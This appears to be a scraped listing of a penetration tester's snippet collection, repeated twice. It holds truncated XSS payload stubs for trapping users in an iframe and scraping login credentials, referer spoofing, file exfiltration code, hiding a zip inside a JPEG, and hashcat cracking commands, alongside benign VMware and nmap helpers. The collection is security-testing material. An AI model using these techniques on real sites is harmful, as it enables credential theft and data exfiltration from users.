Drew hoodoer

## stealCredsPayload.js
alert('Click ok when you\'re ready to enter iframe trap');

// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer

## xssIframeTrap.js
alert('Click ok when you\'re ready to enter iframe trap');

// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer

## mountVmwareShares.sh
#!/bin/bash

vmware-hgfsclient | while read folder; do
  echo "[i] Mounting ${folder}   (/mnt/hgfs/${folder})"
  mkdir -p "/mnt/hgfs/${folder}"
  umount -f "/mnt/hgfs/${folder}" 2>/dev/null
  vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done

sleep 2s

## ovaExport.txt
There’s no GUI option to export an OVA (Open Virtual Appliance) format VM in VMware fusion, but there is a command-line method. Use the OVF tool. The following provides a command-line synopsis.

$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/

$ ./ovftool –acceptAllEulas \
> /Users/me/Documents/Virtual\ Machines.localized/TheVM.vmwarevm/TheVM.vmx \
> ~/Desktop/TheVM.ova

Opening VMX source: […]

## setRefererHeader.js
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath   = window.location.pathname;
var savedSearch = window.location.search;

// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');

// Send malicious request with faked referer header value

## binaryExfileXSS
			fileXhr.open("GET", fileUri);
			fileXhr.send(null);

			console.log("Getting ready to get a file and exfil...");
			fileXhr.onreadystatechange = function()
			{
				if (fileXhr.readyState == XMLHttpRequest.DONE)
				{
					var responseData = encodeURIComponent(fileXhr.response);
					var exfilData = btoa(responseData);

## formFieldClickjackPoc.html
<html>

<style>
.overlay {
  float: top;
  position: absolute;
  padding: 245px;
  width: 250px;
  clear: both;
}

## openPortcounterCommand.txt
cat nmapOutput.gnmap | grep -E -o '[0-9]{1,5}/open' | sort | uniq -c | sort -r | head -n 20

## exfilInImage.txt
copy /b image.jpg+Exfiltration-test.zip New-Image.jpg.

Note above the '.' matters at the end, it's "New-Image.jpg." not "New-Image.jpg"

You can unzip the original zip file from the .jpg (on a linux box)

## hashcatCommands.txt
IKE-PSK:
./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt  -a 0 -r rules/wtf.rule  -O


Responder:
hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule
example:

./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule
	alert('Click ok when you\'re ready to enter iframe trap');

	// Example Credential scraper and
	// XSS iframe trap. Load from whatever
	// page has the reflected/stored XSS vuln
	// trap the user in an iframe of the app.
	// Frame the login page, and copy out the
	// username and password fields.
	// @hoodoer
	alert('Click ok when you\'re ready to enter iframe trap');

	// Example XSS iframe trap. Load from whatever
	// page has the reflected/stored XSS vuln
	// trap the user in an iframe of the app.
	// While they surf around, they stick in your
	// iFrame, and you keep their session and your XSS
	// payload running.
	// @hoodoer
	#!/bin/bash

	vmware-hgfsclient \| while read folder; do
	echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
	mkdir -p "/mnt/hgfs/${folder}"
	umount -f "/mnt/hgfs/${folder}" 2>/dev/null
	vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
	done

	sleep 2s
	There’s no GUI option to export an OVA (Open Virtual Appliance) format VM in VMware fusion, but there is a command-line method. Use the OVF tool. The following provides a command-line synopsis.

	$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/

	$ ./ovftool –acceptAllEulas \
	> /Users/me/Documents/Virtual\ Machines.localized/TheVM.vmwarevm/TheVM.vmx \
	> ~/Desktop/TheVM.ova

	Opening VMX source: […]
	// Save the current URL path to restore after making
	// malicious request with faked referer header value
	var savedPath = window.location.pathname;
	var savedSearch = window.location.search;

	// Change URL/History to control the referer header value
	// Swap out "/this-is-my-fake-referer-value" to be what you need
	window.history.replaceState(null, '', '/this-is-my-fake-referer-value');

	// Send malicious request with faked referer header value
	fileXhr.open("GET", fileUri);
	fileXhr.send(null);

	console.log("Getting ready to get a file and exfil...");
	fileXhr.onreadystatechange = function()
	{
	if (fileXhr.readyState == XMLHttpRequest.DONE)
	{
	var responseData = encodeURIComponent(fileXhr.response);
	var exfilData = btoa(responseData);
	<html>

	<style>
	.overlay {
	float: top;
	position: absolute;
	padding: 245px;
	width: 250px;
	clear: both;
	}
	copy /b image.jpg+Exfiltration-test.zip New-Image.jpg.

	Note above the '.' matters at the end, it's "New-Image.jpg." not "New-Image.jpg"

	You can unzip the original zip file from the .jpg (on a linux box)
	IKE-PSK:
	./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O


	Responder:
	hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule
	example:

	./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule